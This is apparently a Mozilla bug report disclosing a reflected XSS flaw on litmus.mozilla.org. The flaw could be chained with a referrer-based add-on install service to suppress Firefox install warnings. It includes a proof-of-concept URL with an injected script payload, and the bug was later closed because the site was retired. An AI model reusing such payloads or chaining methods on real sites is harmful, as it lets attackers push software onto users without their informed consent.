718448 - XSS vulnerability on litmus.mozilla.org allows circumventing add-on source checks in Firefox

Status: RESOLVED WORKSFORME

(Webtools Graveyard :: Litmus, defect)

Description

[Wladimir Palant]

Please see the example link:

https://litmus.mozilla.org/advanced_search.cgi?search_field1=comment&match_criteria1=regexp&search_value1=8848484&search_field2=build_id&match_criteria2=%3Cscript%3Ewindow%2Elocation%2Ehref=%22https%3A%2F%2Faddons.mozilla.org%2Fservices%2Finstall.php%3Faddon_id%3D1865%26addon_name%3DGreatest%20Add-on%20Ever%22%3C%2Fscript%3E&search_value2=test

This will abuse an XSS vulnerability in litmus.mozilla.org to redirect to https://addons.mozilla.org/services/install.php with a mozilla.org referrer. This page allows installing any AMO add-on if the referring website is a Mozilla site - so in this example you will get prompted to install Adblock Plus without the usual warnings. Regardless of the litmus.mozilla.org vulnerability, I find the functionality of this install script concerning - it allows to use any XSS vulnerability on any Mozilla site to disable security warnings in Firefox when installing add-ons.

As to litmus.mozilla.org, the web application seems riddled with bad security practices. Here I abused the non-existent escaping of the match_criteriaN parameter, other parameters are only escaped via quotemeta however - this is clearly insufficient for strings inserted into HTML even though exploiting this vulnerability isn't simple. It's also compiling SQL queries in a way that makes me suspect SQL vulnerabilities if one digs a little.

Comment 1

[Yvan Boily [:ygjb][:yvan]]

Adding keywords to bugs for metrics, no action required.  Sorry about bugmail spam.

Comment 2

[Wladimir Palant]

Resolving WORKSFORME since litmus.mozilla.org is gone for good. I think that this can be made public now.